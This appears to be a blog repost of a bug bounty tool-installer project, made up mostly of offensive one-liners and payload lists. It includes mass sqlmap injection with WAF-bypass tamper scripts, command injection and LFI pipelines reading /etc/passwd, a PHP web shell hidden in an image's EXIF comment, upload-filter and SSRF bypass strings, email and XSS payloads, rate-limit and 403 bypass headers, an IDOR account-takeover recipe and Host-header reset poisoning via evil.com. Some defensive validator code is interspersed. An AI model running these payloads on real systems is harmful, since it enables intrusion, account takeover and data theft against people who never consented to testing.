Bug Bounty

Bug bounty builder Project

Posted by Stella Sebastian, January 4, 2022


Awesome Bug Bounty Builder Project: all the common tools for finding vulnerabilities in one installer.


Installation:

$ git clone https://github.com/0xJin/awesome-bugbounty-builder.git
$ cd awesome-bugbounty-builder/
$ chmod +x awesome-bugbounty-builder.sh
$ ./awesome-bugbounty-builder.sh

Tools you will find here:

  • Amass
  • Sublister
  • Gauplus
  • HTTPX
  • Gf + patterns
  • Kxss
  • Sqlmap
  • Commix
  • Tplmap
  • HYDRA
  • John the ripper
  • Evilwinrm
  • Arjun
  • Paramspider
  • NoSQLmap
  • NMAP
  • Nikto
  • FFUF
  • 403-Bypass
  • Gobuster
  • Seclists
  • Hash-identifier
  • XSSMAP
  • Smuggler
  • SSRFmap
  • Gmapsapiscanner
  • Qsreplace
  • exiftool
  • XSRFProbe
  • XXE Exploiter
  • Rush
  • Rustscan
  • LFISuite
  • Wapiti

Bug bounty tips, tool usage and one-liners:


One-liner recon for XSS fuzzing:

$ amass enum -brute -passive -d example.com | httpx -silent -status-code | tee domain.txt
// httpx -status-code appends " [200]" to each line, so keep only the URL column before gauplus
$ cut -d' ' -f1 domain.txt | gauplus -random-agent -t 200 | gf xss | kxss | tee domain2.txt

Fuzz all subdomains with FFUF (one-liner):

$ amass enum -brute -passive -d example.com | sed 's/^\*\.//' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w wordlist.txt -u @/FUZZ -mc 200'

Command injection with FFUF (one-liner):

$ cat subdomains.txt | httpx -silent -status-code | cut -d' ' -f1 | gauplus -random-agent -t 200 | qsreplace "aaa%20%7C%7C%20id%3B%20x" > fuzzing.txt
$ ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080
// search for "uid" in the Burp proxy history
// The same pipeline finds SSTI: give qsreplace "{{7*7}}" and search Burp for '49'

SQL injection tips:

// **Mass SQL injection**
$ amass enum -brute -passive -d example.com | httpx -silent -status-code | tee domain.txt
$ cut -d' ' -f1 domain.txt | gauplus -random-agent -t 200 | gf sqli | tee domain2.txt
$ sqlmap -m domain2.txt --dbs --batch --random-agent
// **SQL injection via headers**
$ sqlmap -u "http://redacted.com" --header="X-Forwarded-For: 1*" --dbs --batch --random-agent --threads=10
// **SQL injection behind a 401**
$ sqlmap -u "http://redacted.com" --dbs --batch --random-agent --forms --ignore-code=401

// Pro tip for WAF bypass: add these tamper scripts to sqlmap
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned,space2comment,randomcase

XSS + SQLi + CSTI/SSTI

Payload: '"><svg/onload=prompt(5);>{{7*7}}

Exiftool + file upload tips:

$ exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
// File upload filter bypass filenames
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg
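As an added defensive example (not code from the original post or the project), a server-side upload-name check that rejects every filename in the list above; the image-only extension allowlist and the magic-byte table are assumptions for an image upload endpoint.

```python
import re

# Added example, not code from the original post: a server-side check that
# rejects every "bypass" filename listed above. ALLOWED_EXT and _MAGIC are an
# assumed policy for an image-only upload endpoint.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
_MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff",
          "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}
# Exactly "base.ext", ASCII letters/digits only: no spaces, no second dot.
_PLAIN_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,8}$")


def is_safe_upload_name(raw: str) -> bool:
    """True only for a plain 'base.ext' whose extension is allowlisted."""
    # Control characters (NUL, CR, LF, ...) and path separators are refused,
    # which covers the \x00, %0a / %0d%0a and "file.php/" tricks once the
    # multipart filename has been decoded.
    if any(ord(c) < 0x20 or c in "/\\" for c in raw):
        return False
    # A filename never legitimately arrives percent-encoded at this layer;
    # a '%' means bytes are being smuggled past a decoder (file.php%00.png).
    if "%" in raw:
        return False
    # One dot only: defeats file.png.php, file.php.png and file.php....
    if raw.count(".") != 1 or not _PLAIN_NAME.match(raw):
        return False
    # Compare case-insensitively so pHp5 is not a "new" extension.
    return raw.rsplit(".", 1)[1].lower() in ALLOWED_EXT


def matches_magic(name: str, head: bytes) -> bool:
    """Cross-check the claimed extension against the file's leading bytes."""
    if not is_safe_upload_name(name):
        return False
    return head.startswith(_MAGIC[name.rsplit(".", 1)[1].lower()])
```

A magic-byte check does not stop the exiftool trick above (a valid JPEG can still carry PHP in its comment), so uploads must also be stored where the web server never executes them and be served with a fixed Content-Type.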

Open redirect one-liner:

// $1 is the target domain
$ export LHOST="http://localhost"; gau "$1" | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

LFI one-liner:

$ gauplus -random-agent -t 200 http://redacted.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Best SSRF filter bypass forms:

http://127.1/
http://0000::1:80/
http://[::]:80/
http://2130706433/
http://whitelisted@127.0.0.1
http://0x7f000001/
http://017700000001
http://0177.00.00.01
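As an added defensive example (not from the original post or the project), an outbound-URL check that normalizes hosts the way inet_aton() does, so every form in the list above collapses to the same loopback or unspecified address and is refused; the `resolve` hook and the public-addresses-only policy are assumptions.

```python
import ipaddress
import socket
from typing import Optional
from urllib.parse import urlsplit

# Added example, not code from the original post: an outbound-URL check that
# normalizes hosts the way inet_aton() does, so the shorthand, integer, hex,
# octal and user@-prefixed forms above all collapse to 127.0.0.1 and are
# refused. The resolve hook and the "public addresses only" policy are assumed.

def _part(p: str) -> int:
    """One inet_aton component: 0x.. is hex, a leading 0 means octal."""
    if p[:2].lower() == "0x":
        return int(p[2:], 16)
    if len(p) > 1 and p[0] == "0":
        return int(p, 8)
    return int(p, 10)

def inet_aton_host(host: str) -> Optional[ipaddress.IPv4Address]:
    """Accept a, a.b, a.b.c and a.b.c.d forms; None if not an IPv4 literal."""
    try:
        parts = [_part(p) for p in host.split(".")]
    except ValueError:
        return None
    if not 1 <= len(parts) <= 4 or any(v < 0 for v in parts):
        return None
    last_bits = 8 * (5 - len(parts))  # the last part fills the remaining bits
    if any(v > 255 for v in parts[:-1]) or parts[-1] >= 1 << last_bits:
        return None
    value = 0
    for v in parts[:-1]:
        value = (value << 8) | v
    return ipaddress.IPv4Address((value << last_bits) | parts[-1])

def destination_allowed(url: str, resolve=socket.gethostbyname) -> bool:
    """False when the URL's host is, or resolves to, a non-public address."""
    host = urlsplit(url).hostname  # strips 'user@' and ':port' for us
    if not host:
        return False
    try:
        if ":" in host:  # IPv6 literal such as [::] or ::1
            addr = ipaddress.ip_address(host)
        else:
            addr = inet_aton_host(host)
            if addr is None:  # a DNS name: check what it actually resolves to
                addr = ipaddress.ip_address(resolve(host))
    except (OSError, ValueError):
        return False
    return addr.is_global and not addr.is_multicast
```

A resolved name must also be pinned: connect to the address you checked rather than doing a second lookup, or DNS rebinding undoes the check.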

Email attacks:

// **Header Injection**
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com>\r\nRCPT TO:<victim+"@test.com
// **XSS Injection**
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
// **SSTI**
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
// **SQL Injection**
"' OR 1=1 -- '"@example.com
"mail'); SLEEP(5);--"@example.com
// **SSRF Attack**
john.doe@abc123.burpcollaborator.net
john.doe@[127.0.0.1]

XSS payloads in image filenames:

<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png

My XSS payload for bypassing Cloudflare with its default rules:

"/><svg+svg+svg\/\/On+OnLoAd=confirm(1)>

Find hidden params in javascript files:

$ amass enum -passive -brute -d redacted.com | gau | grep -Ev '\.(css|svg)' | while read url; do vars=$(curl -s "$url" | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,var,'"$url"'?,g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done

IDOR to account takeover, quickly:

~ Create an account
~ In the reset field, set a password and intercept the request with Burp
~ GET /user/2099/reset: change 2099 to 2098 and send the request
~ Take the token
~ Use a cookie editor to set this token
~ Reload the page

For API keys:

Use gauplus and paramspider, then grep for words like "api" or "key" and run gmapsapiscanner to see whether the key is vulnerable.

Find sensitive information with the gf tool:

$ gauplus redacted.com -subs | cut -d"?" -f1 | grep -E '\.js(on)?$' | tee domains.txt
$ sort -u domains.txt | fff -s 200 -o out/
$ for i in $(gf -list); do [[ $i == *_secrets* ]] && gf "$i"; done

Bypass rate limiting by adding one of these headers:

X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwarded-Host: IP

Find access tokens with FFUF and gauplus:

$ cat domains.txt | sed 's/https\?:\/\///' | gau > domains2.txt
$ cat domains2.txt | grep -P "\w+\.js(\?|$)" | sort -u > jsurls.txt
$ ffuf -mc 200 -w jsurls.txt:HFUZZ -u HFUZZ -replay-proxy http://127.0.0.1:8080
// Use the Scan Check Builder Burp extension with a passive profile to extract "accessToken" or "access_token"
// Extract the found tokens and validate them with https://github.com/streaak/keyhacks

Find CORS vulnerabilities:

$ amass enum -d redacted.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] \033[0m{}"' 2>/dev/null

Bypass 403 and 401 with URL override headers:

X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin

Password reset poisoning to account takeover:

// Request
POST https://target.com/password-reset?user=123 HTTP/1.1
Host: evil.com

// If the reset link you receive points at evil.com, this works!
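As an added defensive example (not code from the original post or the project), how a server should treat the three header tricks above: the client-IP spoofing headers from the rate-limit section, the URL override headers from the 403/401 section, and the Host header that reset links must never be built from; the trusted proxy range and canonical host are assumptions.

```python
import ipaddress
from typing import Optional

# Added example, not code from the original post. TRUSTED_PROXIES and
# CANONICAL_HOSTS are assumed deployment values.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]  # assumed reverse proxies
CANONICAL_HOSTS = {"target.com"}                        # assumed allowlist
IP_SPOOF_HEADERS = {"x-originating-ip", "x-forwarded-for", "x-remote-ip",
                    "x-remote-addr", "x-client-ip", "x-host", "x-forwarded-host"}
URL_OVERRIDE_HEADERS = {"x-original-url", "x-override-url", "x-rewrite-url"}


def _lower(headers: dict) -> dict:
    """Header names are case-insensitive; normalize once."""
    return {k.lower(): v for k, v in headers.items()}


def client_ip(peer_ip: str, headers: dict) -> str:
    """Rate-limit key: walk X-Forwarded-For from the right, skipping only hops
    that are our own proxies. A direct peer never gets to choose its IP."""
    raw = _lower(headers).get("x-forwarded-for", "")
    hops = [h.strip() for h in raw.split(",") if h.strip()] + [peer_ip]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer_ip  # malformed entry: trust only the socket peer
        if not any(addr in net for net in TRUSTED_PROXIES):
            return hop
    return peer_ip


def reset_link_base(headers: dict) -> Optional[str]:
    """Reset links come from the allowlisted host, never from the attacker-
    controlled Host header; None means refuse to send the mail."""
    host = _lower(headers).get("host", "").split(":")[0].lower()
    return f"https://{host}" if host in CANONICAL_HOSTS else None


def suspicious_headers(headers: dict) -> list:
    """Detection: spoof/override header names present on a request, worth
    logging whenever the request did not come through a trusted proxy."""
    return sorted(h for h in _lower(headers)
                  if h in IP_SPOOF_HEADERS | URL_OVERRIDE_HEADERS)
```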

Best wordlists:

https://github.com/six2dez/OneListForAll/releases
https://github.com/Karanxa/Bug-Bounty-Wordlists

GitHub link: https://github.com/0xJin/awesome-bugbounty-builder

Tags: Account Takeover, Bug Bounty, bug hunter, SQL injection, SQLMap, vulnerabilities, XXE
© 2021 Reconshell All Rights Reserved.